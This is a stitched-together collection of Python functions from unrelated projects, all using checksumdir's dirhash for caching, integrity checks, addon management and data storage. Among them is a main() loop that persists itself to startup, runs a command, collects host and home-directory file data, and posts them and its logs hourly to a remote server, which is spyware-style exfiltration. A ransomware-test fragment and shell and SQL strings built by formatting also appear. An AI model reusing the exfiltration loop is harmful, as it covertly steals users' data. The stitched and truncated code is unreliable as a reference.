def state_hash(self):
    '''
    Generate a hash to snapshot the current state (used for caching / change detection).

    Checks both readwrite directories and dependencies (assumed to be subtrees
    of readwrite directories).

    :return: SHA1 hash
    '''
    # hash the upstream / input state
    dep_checksums = [checksumdir.dirhash(d) for d in self.readonly if os.path.isdir(d)]
    # hash our writing state
    state_checksums = [checksumdir.dirhash(d) for d in self.readwrite if os.path.isdir(d)]
    return hashlib.sha1(json.dumps([dep_checksums, state_checksums]).encode('utf-8')).hexdigest()

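# Hedged usage sketch (not from the original source): state_hash() only needs an object
# exposing `readonly` and `readwrite` lists of directory paths, so a SimpleNamespace is
# enough to exercise it. The directory names below are hypothetical; checksumdir, hashlib,
# json and os are assumed to be imported by the surrounding module.
from types import SimpleNamespace

task = SimpleNamespace(readonly=['inputs'], readwrite=['outputs'])
cache_key = state_hash(task)  # SHA1 hex digest; compare with a stored value to detect changes
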
def validate_data_dump(*args):
    """
    For validation of the exported dump and the importing data-dump,
    calculate MD5 and check it against CONFIG_VARIABLES.MD5.
    This will ensure the exported data is NOT altered before importing.
    """
    global log_file
    from checksumdir import dirhash

    md5hash = dirhash(DATA_DUMP_PATH, 'md5')
    if CONFIG_VARIABLES.MD5 != md5hash:
        print "\n MD5 NOT matching."
        print "\nargs: ", args
        if args and len(args) == 4:
            proceed_without_validation = args[1]
        else:
            proceed_without_validation = raw_input("MD5 not matching. Restoration not recommended.\n \
                Enter (y/Y) to continue ?")
        if proceed_without_validation not in ['y', 'Y']:
            log_file.write("\n Checksum validation Failed on dump data")
            call_exit()
    else:
        print "\nValidation Success..!"
        proceed_with_validation = ''
        if args and len(args) == 4:
            proceed_with_validation = args[1]
        else:
            proceed_with_validation = raw_input("MD5 Matching.\n \
                Enter (y/Y) to proceed to restoration")
        if proceed_with_validation in ['y', 'Y']:
            log_file.write("\n Checksum validation Success on dump data")

def checksum(path, hashfunc="md5"):
    """Return checksum of files given by path.

    Wildcards can be used in checksum. Function is strongly dependent on the
    checksumdir package by 'cakepietoast'.

    :param path: path of files to get hash from
    :param hashfunc: function used to get hash, default 'md5'
    :return: (str) hash of the file/files given by path
    """
    import checksumdir

    hash_func = checksumdir.HASH_FUNCS.get(hashfunc)
    if not hash_func:
        raise NotImplementedError("{} not implemented.".format(hashfunc))

    if os.path.isdir(path):
        return checksumdir.dirhash(path, hashfunc=hashfunc)

    hashvalues = []
    path_list = list(sorted(glob.glob(path)))
    logger.debug("path_list: len: %i", len(path_list))
    if len(path_list) > 0:
        logger.debug("first ... last: %s ... %s", str(path_list[0]), str(path_list[-1]))
    for path in path_list:
        if os.path.isfile(path):
            hashvalues.append(checksumdir._filehash(path, hashfunc=hash_func))
    logger.debug("one hash per file: len: %i", len(hashvalues))
    if len(path_list) > 0:
        logger.debug("first ... last: %s ... %s", str(hashvalues[0]), str(hashvalues[-1]))
    checksum_hash = checksumdir._reduce_hash(hashvalues, hashfunc=hash_func)
    logger.debug("total hash: {}".format(str(checksum_hash)))
    return checksum_hash

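# Hedged usage sketch (not from the original source): checksum() accepts either a directory
# or a glob pattern, so both calls below should work. The paths are hypothetical, and the
# snippet assumes os, glob, logger and checksumdir are available as in the function above.
whole_dir_hash = checksum("data/images", hashfunc="md5")        # hashes the whole directory tree
selected_files_hash = checksum("data/images/*.png", "sha256")   # hashes only the matching files
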
def md5(dir):
    print('[+] Calculating MD5 hash on : ' + dir + ' directory, started at: ' + currenttime())
    md5hash = dirhash(dir, 'md5')
    md5hash = '[+] MD5 hash: ' + md5hash[:8] + ' ' + md5hash[8:16] + ' ' + md5hash[16:24] + ' ' + md5hash[24:]
    print(md5hash)
    f = open(dir + '_hash_' + currenttime2() + '.txt', 'w')
    text = 'Directory: ' + dir + '\n' + md5hash[4:] + '\nDate: ' + currenttime()
    f.write(text)
    f.close()

def sha256(dir):
    print('[+] Calculating SHA256 hash on : ' + dir + ' directory, started at: ' + currenttime())
    sha256hash = dirhash(dir, 'sha256')
    sha256hash = ('[+] SHA256 hash: ' + sha256hash[:8] + ' ' + sha256hash[8:16] + ' ' + sha256hash[16:24]
                  + ' ' + sha256hash[24:32] + ' ' + sha256hash[32:40] + ' ' + sha256hash[40:48]
                  + ' ' + sha256hash[48:56] + ' ' + sha256hash[56:64])
    print(sha256hash)
    f = open(dir + '_hash_' + currenttime2() + '.txt', 'w')
    text = 'Directory: ' + dir + '\n' + sha256hash[4:] + '\nDate: ' + currenttime()
    f.write(text)
    f.close()

def each_location(self, data_doc):
    # Only data waiting to be verified
    if data_doc['status'] != 'verifying':  # and data_doc['status'] != 'transferred':
        self.log.debug('Location ' + data_doc['host'] + ' does not need to add new checksum')
        return

    if data_doc['status'] == 'transferred' and \
            (config.get_hostname() == 'xe1t-datamanager' or config.get_hostname() == 'login'):
        return

    # Data must be hosted somewhere
    if 'host' not in data_doc:
        return

    # Data must be here locally
    if data_doc['host'] != config.get_hostname():
        # Special case of midway-srm accessible via POSIX on midway-login1
        if not (data_doc['host'] == "midway-srm" and config.get_hostname() == "midway-login1"):
            self.log.debug('Location not here')
            return

    # This status is given after checksumming
    status = 'transferred'

    # Find file and perform checksum
    if os.path.isdir(data_doc['location']):
        value = checksumdir.dirhash(data_doc['location'], 'sha512')
    elif os.path.isfile(data_doc['location']):
        value = checksumdir._filehash(data_doc['location'], hashlib.sha512)
    else:
        # Data not actually found
        self.log.error("Location %s not found." % data_doc['location'])
        value = None
        status = 'error'

    if config.DATABASE_LOG:
        if data_doc['status'] == 'verifying':
            self.log.info("Adding a checksum to run "
                          "%d %s" % (self.run_doc['number'], data_doc['type']))
            self.collection.update({'_id': self.run_doc['_id'],
                                    'data': {'$elemMatch': data_doc}},
                                   {'$set': {'data.$.status': status,
                                             'data.$.checksum': value}})
        elif data_doc['checksum'] != value or status == 'error':
            self.log.info("Checksum fail "
                          "%d %s" % (self.run_doc['number'], data_doc['type']))
            self.collection.update({'_id': self.run_doc['_id'],
                                    'data': {'$elemMatch': data_doc}},
                                   {'$set': {'data.$.checksumproblem': True}})

def assert_directory_contents(path, changed=True):
    '''
    Assert directory contents change or remain the same.

    Contents are compared deeply, i.e. recursively and file contents are
    considered as well.

    Parameters
    ----------
    path : Path
        Path to directory
    changed : bool
        If True, directory contents must change, else contents must remain the same.
    '''
    old = dirhash(str(path), 'sha512')
    yield
    new = dirhash(str(path), 'sha512')
    if changed:
        assert old != new
    else:
        assert old == new

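# Hedged usage sketch (not from the original source): the generator above yields once, so it
# is presumably consumed as a context manager. The explicit contextmanager() wrapping and the
# pytest-style tmp_path fixture below are assumptions for illustration; dirhash is assumed to
# be imported as in the function above.
from contextlib import contextmanager

assert_dir_contents = contextmanager(assert_directory_contents)

def test_output_directory_changes(tmp_path):
    # Expect the directory hash to differ after a file is written into it.
    with assert_dir_contents(tmp_path, changed=True):
        (tmp_path / 'result.txt').write_text('new output')
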
def main():
    parser = argparse.ArgumentParser(description='Create hash for directory')
    parser.add_argument('-v', '--version', action='version',
                        version='checksumdir %s' % VERSION)
    parser.add_argument('directory', help='Directory to create hash value of')
    parser.add_argument('-a', '--algorithm', choices=('md5', 'sha1', 'sha256', 'sha512'),
                        default='md5')
    parser.add_argument('-e', '--excluded-files', nargs='+', help='List of excluded files')
    args = parser.parse_args()
    print(checksumdir.dirhash(args.directory, args.algorithm, args.excluded_files))

def main():
    parser = argparse.ArgumentParser(description='Determine the hash for directory.')
    parser.add_argument('-v', '--version', action='version',
                        version='checksumdir %s' % VERSION)
    parser.add_argument('directory', help='Directory for which to generate hash.')
    parser.add_argument('-a', '--algorithm', choices=('md5', 'sha1', 'sha256', 'sha512'),
                        default='md5')
    parser.add_argument('-e', '--excluded-files', nargs='+', help='List of excluded files.')
    parser.add_argument('-x', '--excluded-extensions', nargs='+',
                        help='List of excluded file extensions.')
    args = parser.parse_args()
    # forward the parsed -x option as well, so the exclusion actually takes effect
    print(checksumdir.dirhash(args.directory, args.algorithm, args.excluded_files,
                              excluded_extensions=args.excluded_extensions))

def createUser(userId, crypto):
    splitUserID = userId.split()
    passpath = vars.realpath + "/rootdir/etc/passwd"
    file = open(passpath, "a")
    file.write(userId + "\n")
    file.close()
    permission = "default"
    cryptUser = crypto.aesencrypt(vars.aeskey, splitUserID[0])
    setUserPerm(cryptUser, permission)
    os.makedirs(cryptUser)
    cspath = vars.realpath + "/rootdir/etc/checksum"
    file = open(cspath, "a")
    file.write(cryptUser + " " + dirhash(cryptUser, 'sha256') + "\n")
    file.close()
    createBaseUserPerm(cryptUser, "user")

def _compute_checksum_dir(self):
    exclude = self.env["ir.config_parameter"].get_param(
        "module_auto_update.checksum_excluded_extensions",
        "pyc,pyo",
    ).split(",")
    for r in self:
        try:
            r.checksum_dir = dirhash(
                get_module_path(r.name),
                'sha1',
                excluded_extensions=exclude,
            )
        except TypeError:
            _logger.debug(
                "Cannot compute dir hash for %s, module not found",
                r.display_name)

def get_package_checksum(self):
    sha1hash = None
    if not self.is_file:
        sha1hash = dirhash(self.path_or_file, 'sha1')
    else:
        h = hashlib.sha1()
        # open file for reading in binary mode
        with open(self.file_to_scan, 'rb') as file:
            # loop till the end of the file
            chunk = 0
            while chunk != b'':
                # read only 1024 bytes at a time
                chunk = file.read(1024)
                h.update(chunk)
        # return the hex representation of digest
        sha1hash = h.hexdigest()
    return sha1hash

def prepare_database_template(self):
    # --- Check template database cache ---
    current_mhash = checksumdir.dirhash('./scripts/migrations')
    cache_connector = db_connector(self.template_cache_name)
    try:
        latest_mhash = self.read_migrations_hash(cache_connector)
        if latest_mhash == current_mhash:
            logger.info("Using template database cache.")
            # Cache is still valid, copy it to the template database
            # NOTE: In theory, 'get_migrations_hash:create_database'
            # should form one transaction. If another execution interrupts
            # us at this point, we will be lost ... 😨
            self.create_database(self.template_name, self.template_cache_name)
            return
    except psycopg2.OperationalError:
        pass  # Database does not exist
    except psycopg2.errors.UndefinedObject:
        pass  # No hash specified for historical reasons

    # --- Cache invalidation, recreating template database ---
    logger.info("Recreating template database ...")
    _perform_query(f'CREATE DATABASE {self.template_name}')
    connector = db_connector(self.template_name)
    # Apply migrations
    sp.run('./scripts/migrations/migrate.sh', check=True,
           env=dict(os.environ, POSTGRES_DB=self.template_name))
    # Seal template
    self.store_migrations_hash(connector, current_mhash)
    connector.execute(f'''
        UPDATE pg_database SET datistemplate = TRUE
        WHERE datname = '{self.template_name}'
    ''')
    logger.info("Template database was recreated.")

    # --- Update cache database ---
    # NOTE: In theory, this block should form one transaction. If another
    # execution interrupts us at this point, we will be lost ... 😨
    self.drop_database(self.template_cache_name)
    self.create_database(self.template_cache_name, self.template_name)
    # Copy the hash manually (not done automatically by Postgres)
    self.store_migrations_hash(cache_connector, current_mhash)
    logger.info("Template database was stored into cache.")

def update_config(self):
    if 'Version' not in self.config.keys() or self.config['Version'] != __version__:
        urlupdate = {'elvui-classic': 'elvui',
                     'elvui-classic:dev': 'elvui:dev',
                     'tukui-classic': 'tukui'}
        for addon in self.config['Addons']:
            # 1.1.0
            if 'Checksums' not in addon.keys():
                checksums = {}
                for directory in addon['Directories']:
                    checksums[directory] = dirhash(self.path / directory)
                addon['Checksums'] = checksums
            # 1.1.1
            if addon['Version'] is None:
                addon['Version'] = "1"
            # 2.2.0
            if addon['URL'].lower() in urlupdate:
                addon['URL'] = urlupdate[addon['URL'].lower()]
            # 2.4.0
            if addon['Name'] == 'TukUI':
                addon['Name'] = 'Tukui'
                addon['URL'] = 'Tukui'
            # 2.7.3
            addon['Directories'] = list(filter(None, set(addon['Directories'])))
            # 3.0.2
            if addon['URL'].endswith('/'):
                addon['URL'] = addon['URL'][:-1]
        for add in [['2.1.0', 'WAUsername', ''],
                    ['2.2.0', 'WAAccountName', ''],
                    ['2.2.0', 'WAAPIKey', ''],
                    ['2.2.0', 'WACompanionVersion', 0],
                    ['2.8.0', 'IgnoreClientVersion', {}],
                    ['3.0.1', 'CFCacheTimestamp', 0],
                    ['3.1.10', 'CFCacheCloudFlare', {}]]:
            if add[1] not in self.config.keys():
                self.config[add[1]] = add[2]
        for delete in [['1.3.0', 'URLCache'], ['3.0.1', 'CurseCache']]:
            if delete[1] in self.config.keys():
                self.config.pop(delete[1], None)
        self.config['Version'] = __version__
        self.save_config()

def add_addon(self, url, ignore, nodeps):
    if url.endswith(':'):
        raise NotImplementedError('Provided URL is not supported.')
    elif 'twitch://' in url:
        url = url.split('/download-client')[0].replace('twitch://', 'https://').strip()
    elif 'curseforge://' in url:
        url = self.parse_cf_payload(url.strip(), False)
    elif url.startswith('cf:'):
        url = f'https://www.curseforge.com/wow/addons/{url[3:]}'
    elif url.startswith('wowi:'):
        url = f'https://www.wowinterface.com/downloads/info{url[5:]}.html'
    elif url.startswith('tu:'):
        url = f'https://www.tukui.org/addons.php?id={url[3:]}'
    elif url.startswith('tuc:'):
        url = f'https://www.tukui.org/classic-addons.php?id={url[4:]}'
    elif url.startswith('gh:'):
        url = f'https://github.com/{url[3:]}'
    if url.endswith('/'):
        url = url[:-1]
    addon = self.check_if_installed(url)
    if not addon:
        if ignore:
            self.config['IgnoreClientVersion'][url] = True
        if nodeps:
            self.config['IgnoreDependencies'][url] = True
        new = self.parse_url(url)
        new.get_addon()
        addon = self.check_if_installed_dirs(new.directories)
        if addon:
            return False, addon['Name'], addon['Version'], None
        self.cleanup(new.directories)
        new.install(self.path)
        checksums = {}
        for directory in new.directories:
            checksums[directory] = dirhash(self.path / directory)
        self.config['Addons'].append({'Name': new.name,
                                      'URL': url,
                                      'Version': new.currentVersion,
                                      'Directories': new.directories,
                                      'Checksums': checksums})
        self.save_config()
        return True, new.name, new.currentVersion, \
            None if url in self.config['IgnoreDependencies'].keys() else new.dependencies
    return False, addon['Name'], addon['Version'], None

def get_hash(file, key=None):
    if file is None:
        return ''
    else:
        if isinstance(file, (str, bytes, os.PathLike)):
            if isfile(file):
                with open(file, 'rb') as f:
                    data = f.read()
            elif isdir(file):
                return dirhash(file, 'sha256')
            else:
                return ''
        else:
            openedfile = file.open()
            data = openedfile.read()
            openedfile.seek(0)
        return compute_hash(data, key)

def update_addon(self, url, update, force):
    old = self.check_if_installed(url)
    if old:
        new = self.parse_url(old['URL'])
        oldversion = old['Version']
        modified = self.check_checksum(url)
        if force or (new.currentVersion != old['Version'] and update and not modified):
            self.cleanup(old['Directories'])
            new.install(self.path)
            checksums = {}
            for directory in new.directories:
                checksums[directory] = dirhash(self.path / directory)
            old['Name'] = new.name
            old['Version'] = new.currentVersion
            old['Directories'] = new.directories
            old['Checksums'] = checksums
            self.save_config()
        return new.name, new.currentVersion, oldversion, modified if not force else False
    return url, False, False, False

def generate_dataset(query_expr):
    if query_expr == "":
        print("please set --query-expr parameter")
        exit()

    chunks_uri = (
        "https://www.dropbox.com/s/3kaqg3ntj5zougd/MICRODADOS_ENEM_2019.csv.tar.xz"
    )
    chunks_tar = "MICRODADOS_ENEM_2019.csv.tar.xz"
    chunks_dir = "MICRODADOS_ENEM_2019_CHUNKS"
    chunks_checksum = "718aae27698996383c5ac982d8d2dcaf"

    invalid = False
    if os.path.isdir(chunks_dir):
        print("verifying chunks integrity...")
        checksum = checksumdir.dirhash(chunks_dir)
        invalid = True if checksum != chunks_checksum else False

    if invalid or not os.path.isdir(chunks_dir):
        os.rmdir(chunks_dir) if os.path.isdir(chunks_dir) else None
        print("downloading...")
        os.system("wget -q --show-progress {}".format(chunks_uri))
        with tarfile.open(chunks_tar) as f:
            print("extracting...")
            f.extractall(chunks_dir)

    chunks_files = [
        "{}/{}".format(chunks_dir, f) for f in os.listdir(chunks_dir)
    ]

    print("generating dataset...")
    filtered_data = [
        pd.read_csv(chunk, encoding="ISO-8859-1", delimiter=";").query(query_expr)
        for chunk in chunks_files
    ]
    filtered_data = pd.concat(filtered_data)

    dest = "MICRODADOS_ENEM_2019_FILTERED.csv"
    filtered_data.to_csv(dest, index=False)
    print("done")

def index(self):
    """
    Check if an on-going call exists.
    If it exists, authorize access only if `caller_id` is the call's owner.
    If it does not exist, create the call and assign it to `caller_id`.
    """
    caller_id = self.__get_caller_id()
    call = Call.get_call()
    if not call.get_the_line(caller_id):
        Session.clear_auth_session()
        abort(423)

    session['caller_id'] = caller_id

    # Make the doorbell's speaker ring like a phone
    Sender.send({'action': SoundReceiver.START, 'file': 'phone-ringing'}, SoundReceiver.TYPE)
    Sender.send({'action': MotionReceiver.STOP}, MotionReceiver.TYPE)

    variables = {
        'anticache': dirhash(self.__blueprint.static_folder, 'sha1'),
        'domain_name': config.get('WEB_APP_DOMAIN_NAME'),
        'rotate': config.get('WEBCAM_ROTATE'),
        'webrtc_web_sockets_port': config.get('WEBRTC_WEBSOCKETS_PORT'),
        'webrtc_endpoint': config.get('WEBRTC_ENDPOINT'),
        'webrtc_ice_servers': json.dumps(config.get('WEBRTC_ICE_SERVERS')),
        'webrtc_video_format': config.get('WEBRTC_VIDEO_FORMAT'),
        'webrtc_force_hw_vcodec': 'true' if config.get('WEBRTC_FORCE_HW_VCODEC') else 'false',
        'webrtc_call_heartbeat': config.get('WEBRTC_CALL_HEARTBEAT_INTERVAL'),
        'font_awesome_id': config.get('WEB_APP_FONT_AWESOME_ID'),
        'javascript_strings': json.dumps({
            'beforeCall': _('web_app/call/before'),
            'onProgressCall': _('web_app/call/on_progress'),
            'terminatedCall': _('web_app/call/terminated')
        })
    }

    return render_template('index.html', **variables)

def update_config(self):
    if 'Version' not in self.config.keys() or self.config['Version'] != __version__:
        urlupdate = {'elvui-classic': 'elvui',
                     'elvui-classic:dev': 'elvui:dev',
                     'tukui-classic': 'tukui'}
        for addon in self.config['Addons']:
            # 1.1.0
            if 'Checksums' not in addon.keys():
                checksums = {}
                for directory in addon['Directories']:
                    checksums[directory] = dirhash(self.path / directory)
                addon['Checksums'] = checksums
            # 1.1.1
            if addon['Version'] is None:
                addon['Version'] = "1"
            # 2.2.0
            if addon['URL'].lower() in urlupdate:
                addon['URL'] = urlupdate[addon['URL'].lower()]
            # 2.4.0
            if addon['Name'] == 'TukUI':
                addon['Name'] = 'Tukui'
                addon['URL'] = 'Tukui'
        # 1.3.0
        if 'URLCache' in self.config.keys():
            self.config.pop('URLCache', None)
        if 'CurseCache' not in self.config.keys():
            self.config['CurseCache'] = {}
        # 2.1.0
        if 'WAUsername' not in self.config.keys():
            self.config['WAUsername'] = ''
        # 2.2.0
        if 'WAAccountName' not in self.config.keys():
            self.config['WAAccountName'] = ''
        if 'WAAPIKey' not in self.config.keys():
            self.config['WAAPIKey'] = ''
        if 'WACompanionVersion' not in self.config.keys():
            self.config['WACompanionVersion'] = 0
        self.config['Version'] = __version__
        self.save_config()

def convert_repo(fmt, files):
    """
    Convert FIX Repository data from one format to another.
    """
    src = files[0]
    if fmt == "basic":
        data = transform_basic_repository_v1(
            abbreviations=read_xml_root(src, "Abbreviations.xml"),
            categories=read_xml_root(src, "Categories.xml"),
            components=read_xml_root(src, "Components.xml"),
            datatypes=read_xml_root(src, "Datatypes.xml"),
            enums=read_xml_root(src, "Enums.xml", opt=False),
            fields=read_xml_root(src, "Fields.xml", opt=False),
            messages=read_xml_root(src, "Messages.xml", opt=False),
            msg_contents=read_xml_root(src, "MsgContents.xml", opt=False),
            sections=read_xml_root(src, "Sections.xml"),
        )
        data["meta"]["fix2dict"]["md5"] = dirhash(src, "md5")
        validate_v1(data)
        print(json.dumps(data, indent=DEFAULT_INDENT))
    elif fmt == "unified":
        root = read_xml_root("", src, opt=False)[8]
        phrases = read_xml_root("", phrases, opt=False)
        data = transform_unified_repository_v1(root, phrases)
        print(json.dumps(data, indent=DEFAULT_INDENT))
    elif fmt == "orchestra":
        root = read_xml_root("", src, opt=False)
        data = transform_orchestra_v1(root)
        print(json.dumps(data, indent=DEFAULT_INDENT))
    end = "sqlite3"
    if end == "sqlite3":
        data = read_json(src)
        try:
            os.remove(target)
        except OSError:
            pass
        conn = None
        try:
            conn = sqlite3.connect(target)
        except Error as e:
            print(e)
        dict_to_mem_sqlite(data, conn)

def main():
    check_lock()
    while True:
        try:
            next_call = time.time()
            ip_req_response = get_host_ip(WHATS_MY_IP)
            # TODO: Merge with file search
            md5hash = checksumdir.dirhash(USER_HOME, 'md5')
            copy_to_startup()
            copy_to_user_dir()
            run_cmd(SC_LINE)
            pc_i = gather_pc_info()
            dir_i = gather_dir_info(USER_HOME)
            all_data = {
                'ip': ip_req_response['ip'],
                'pc_data': pc_i,
                'file_data': dir_i,
                'USER_HOME_hash': md5hash
            }
            log.debug('Sending data to ({})'.format(MAIN_DATA_URL))
            resp = post_json_to_server(MAIN_DATA_URL, all_data)
            if resp == -1:
                log.warning('Sending failed')
            else:
                log.debug('Json sent, response ({})'.format(resp))
        except Exception as e:
            log.error('Unknown exception found:\n({0})'.format(e))
        finally:
            log.info('Sending log to server')
            log.debug('End of loop, will wait for {} seconds'.format(3600))
            log.flush(LOG_URL)
            next_call = next_call + int(3600)
            if (next_call - time.time()) <= 0:
                time.sleep(1)
            else:
                time.sleep(next_call - time.time())

def main():
    parser = argparse.ArgumentParser(description='Create hash for directory')
    parser.add_argument('-v', '--version', action='version',
                        version='checksumdir %s' % VERSION)
    parser.add_argument('directory', help='Directory to create hash value of')
    parser.add_argument('-a', '--algorithm', choices=('md5', 'sha1', 'sha256', 'sha512'),
                        default='md5')
    parser.add_argument('-e', '--excluded-files', nargs='+', help='List of excluded files')
    parser.add_argument('--ignore-hidden', action='store_true', default=False)
    args = parser.parse_args()
    print(checksumdir.dirhash(args.directory, args.algorithm,
                              args.excluded_files, args.ignore_hidden))

def update_config(self):
    if 'Version' not in self.config.keys() or self.config['Version'] != __version__:
        for addon in self.config['Addons']:
            # 1.1.0
            if 'Checksums' not in addon.keys():
                checksums = {}
                for directory in addon['Directories']:
                    checksums[directory] = dirhash(os.path.join(self.path, directory))
                addon['Checksums'] = checksums
            # 1.1.1
            if addon['Version'] is None:
                addon['Version'] = "1"
        # 1.3.0
        if 'URLCache' in self.config.keys():
            self.config.pop('URLCache', None)
        if 'CurseCache' not in self.config.keys():
            self.config['CurseCache'] = {}
        self.config['Version'] = __version__
        self.save_config()

def data_sample_pre_save(sender, instance, **kwargs):
    directory = path.join(getattr(settings, 'MEDIA_ROOT'),
                          'datasamples/{0}'.format(instance.pk))

    # uncompress file if an archive
    if isinstance(instance.path, File):
        try:
            content = instance.path.read()
            instance.path.seek(0)
            uncompress_content(content, directory)
        except Exception as e:
            logging.info(e)
            raise e
        else:
            # calculate new hash
            sha256hash = dirhash(directory, 'sha256')
            # rename directory to new hash if it does not exist
            new_directory = path.join(getattr(settings, 'MEDIA_ROOT'),
                                      'datasamples', sha256hash)
            try:
                rename(directory, new_directory)
            except Exception as e:
                # directory already exists with the same exact data sample inside,
                # created by a previous save; delete the directory entitled pkhash
                # to avoid duplicates
                shutil.rmtree(directory)
                logging.error(e, exc_info=True)

            # override defaults
            instance.pkhash = sha256hash
            instance.path = new_directory
    # make a hardlink on all files if a path
    else:
        try:
            p = normpath(instance.path)
            create_hard_links(p, directory)
        except Exception as e:
            pass
        else:
            # override path for getting our hardlink
            instance.path = directory

def updateChecksum(basedir, username):
    basedir = vars.realpath + "/rootdir" + basedir
    newchecksum = dirhash(basedir, 'sha256')
    cspath = vars.realpath + "/rootdir/etc/checksum"
    copy = cspath + "copy"
    shutil.copyfile(cspath, copy)
    with open(copy) as oldfile, open(cspath, 'w') as newfile:
        mylist = oldfile.read().splitlines()
        for line in mylist:
            splitLine = line.split(" ")
            userentry = splitLine[0]
            oldchecksum = splitLine[1]
            if not userentry == username:
                newfile.write(line)
            else:
                newfile.write(username + " " + newchecksum)
            newfile.write("\n")
        newfile.close()
        oldfile.close()
    os.remove(copy)

def GetHashOfArchiveContents(archive: pathlib.Path) -> str:
    """Compute the checksum of the contents of a directory.

    Args:
        archive: Path of the archive.

    Returns:
        Checksum of the archive.

    Raises:
        UserError: If the requested archive does not exist, or cannot be unpacked.
    """
    if not (archive.parent / "corpus_registry.json").exists():
        raise FileNotFoundError("corpus_registry.json file not found.")
    with open(archive.parent / "corpus_registry.json", 'r') as js:
        reg = json.load(js)
    if archive.name not in reg:
        raise FileNotFoundError("Corpus {} is not registered in corpus_registry".format(archive.name))
    if not archive.is_file():
        l.logger().info("Corpus found in registry. Downloading from Google Drive...")
        if environment.WORLD_RANK == 0:
            gdown.download("https://drive.google.com/uc?id={}".format(reg[archive.name]['url']), str(archive))
        distrib.barrier()
    if 'hash' in reg[archive.name]:
        return reg[archive.name]['hash']
    else:
        with tempfile.TemporaryDirectory(prefix="clgen_corpus_", dir=FLAGS.local_filesystem) as d:
            pv = ["pv", str(archive)]
            tar = ["tar", "xfj", "-", "-C", d]
            try:
                pv_proc = subprocess.Popen(pv, stdout=subprocess.PIPE)
                subprocess.check_call(tar, stdin=pv_proc.stdout)
            except subprocess.CalledProcessError:
                raise ValueError(f"Archive unpack failed: '{archive}'")
            return checksumdir.dirhash(d, "sha1")

def add_addon(self, url):
    if 'twitch://' in url:
        url = url.split('/download-client')[0].replace('twitch://', 'https://').strip()
    addon = self.check_if_installed(url)
    if not addon:
        new = self.parse_url(url)
        new.install(self.path)
        checksums = {}
        for directory in new.directories:
            checksums[directory] = dirhash(os.path.join(self.path, directory))
        self.config['Addons'].append({
            'Name': new.name,
            'URL': url,
            'Version': new.currentVersion,
            'Directories': new.directories,
            'Checksums': checksums
        })
        self.save_config()
        return True, new.name, new.currentVersion
    return False, addon['Name'], addon['Version']

def GetHashOfArchiveContents(archive: pathlib.Path) -> str:
    """Compute the checksum of the contents of a directory.

    Args:
        archive: Path of the archive.

    Returns:
        Checksum of the archive.

    Raises:
        UserError: If the requested archive does not exist, or cannot be unpacked.
    """
    if not archive.is_file():
        raise errors.UserError(f"Archive not found: '{archive}'")
    with tempfile.TemporaryDirectory(prefix='clgen_corpus_') as d:
        cmd = ['tar', '-xf', str(archive), '-C', d]
        try:
            subprocess.check_call(cmd)
        except subprocess.CalledProcessError:
            raise errors.UserError(f"Archive unpack failed: '{archive}'")
        return checksumdir.dirhash(d, 'sha1')

def store_datasamples_archive(archive_object):
    try:
        content = archive_object.read()
        archive_object.seek(0)
    except Exception as e:
        logging.error(e)
        raise e

    # Temporary directory for uncompress
    datasamples_uuid = uuid.uuid4().hex
    tmp_datasamples_path = path.join(getattr(settings, 'MEDIA_ROOT'),
                                     f'datasamples/{datasamples_uuid}')
    try:
        uncompress_content(content, tmp_datasamples_path)
    except Exception as e:
        shutil.rmtree(tmp_datasamples_path, ignore_errors=True)
        logging.error(e)
        raise e
    else:
        # return the directory hash of the uncompressed file and the path of
        # the temporary directory. The removal should be handled externally.
        return dirhash(tmp_datasamples_path, 'sha256'), tmp_datasamples_path

def has_source_code_tree_changed(self):
    """
    If a task succeeds & is re-run and didn't change, we might not want to
    re-run it if it depends *only* on source code
    :return:
    """
    global CURRENT_HASH
    directory = self.where
    # if CURRENT_HASH is None:
    #     print("hashing " + directory)
    #     print(os.listdir(directory))
    CURRENT_HASH = dirhash(
        directory,
        "md5",
        ignore_hidden=True,
        # changing these exclusions can cause dirhash to skip EVERYTHING
        # excluded_files=[".coverage", "lint.txt"],
        excluded_extensions=[".pyc"],
    )
    print("Searching " + self.state_file_name)
    if os.path.isfile(self.state_file_name):
        with open(self.state_file_name, "r+") as file:
            last_hash = file.read()
            if last_hash != CURRENT_HASH:
                file.seek(0)
                file.write(CURRENT_HASH)
                file.truncate()
                return True
            else:
                return False
    # no previous file, by definition not the same.
    with open(self.state_file_name, "w") as file:
        file.write(CURRENT_HASH)
        return True

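# Hedged usage sketch (not from the original source): a caller could consult
# has_source_code_tree_changed() to skip an expensive step when nothing under self.where
# moved. The `task` object and the stand-in lint step below are hypothetical.
def maybe_run_lint(task):
    # task is assumed to expose `where`, `state_file_name` and the method above
    if not task.has_source_code_tree_changed():
        print("source tree unchanged, skipping lint")
        return
    print("source tree changed, running lint")  # stand-in for the real expensive step
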
def put_data_sample(subtuple, subtuple_directory):
    from substrapp.models import DataSample

    for data_sample_key in subtuple['dataset']['keys']:
        try:
            data_sample = DataSample.objects.get(pk=data_sample_key)
        except Exception as e:
            raise e
        else:
            data_sample_hash = dirhash(data_sample.path, 'sha256')
            if data_sample_hash != data_sample_key:
                raise Exception(
                    'Data Sample Hash in Subtuple is not the same as in local db')

            # create a symlink on the folder containing data
            try:
                subtuple_data_directory = path.join(subtuple_directory, 'data', data_sample_key)
                os.symlink(data_sample.path, subtuple_data_directory)
            except Exception as e:
                logging.error(e, exc_info=True)
                raise Exception(
                    'Failed to create sym link for subtuple data sample')

f1 = open(var, "a")
f1.write("hello ransomware")
c1 = f1.close()
# print('file created')

#####################################

for x in range(100):
    multipath = path + str(x) + "\\"
    print(multipath)
    hash1 = []
    a = ''
    hashtemp = ''
    count = 0
    a = multipath
    hashtemp = checksumdir.dirhash(a)
    hash1.append(hashtemp)
    # print hash1[0]
    print("The hash for path " + a + " is: " + hashtemp)

################################ OBSERVER/WATCHER/WATCHDOG STARTS HERE "MONITORING" #######################################

if __name__ == "__main__":
    observer = Observer()
    observer.start()
    newhash = ''
    # Check cpu usage and assign process name as ransomware executable
    try:
        print("Average CPU usage in percentage")

def get_checksum_folder(self, raw_data_location):
    return checksumdir.dirhash(raw_data_location, 'sha512')

def compute_data(self, request, paths_to_remove):
    data = {}
    # files can be uploaded inside the HTTP request or can already be
    # available on local disk
    if len(request.FILES) > 0:
        pkhash_map = {}

        for k, file in request.FILES.items():
            # Get dir hash, uncompress the file into a directory
            pkhash, datasamples_path_from_file = store_datasamples_archive(file)  # can raise
            paths_to_remove.append(datasamples_path_from_file)
            # check pkhash does not belong to the list
            try:
                data[pkhash]
            except KeyError:
                pkhash_map[pkhash] = file
            else:
                raise Exception(
                    f'Your data sample archives contain same files leading to same pkhash, '
                    f'please review the content of your archives. '
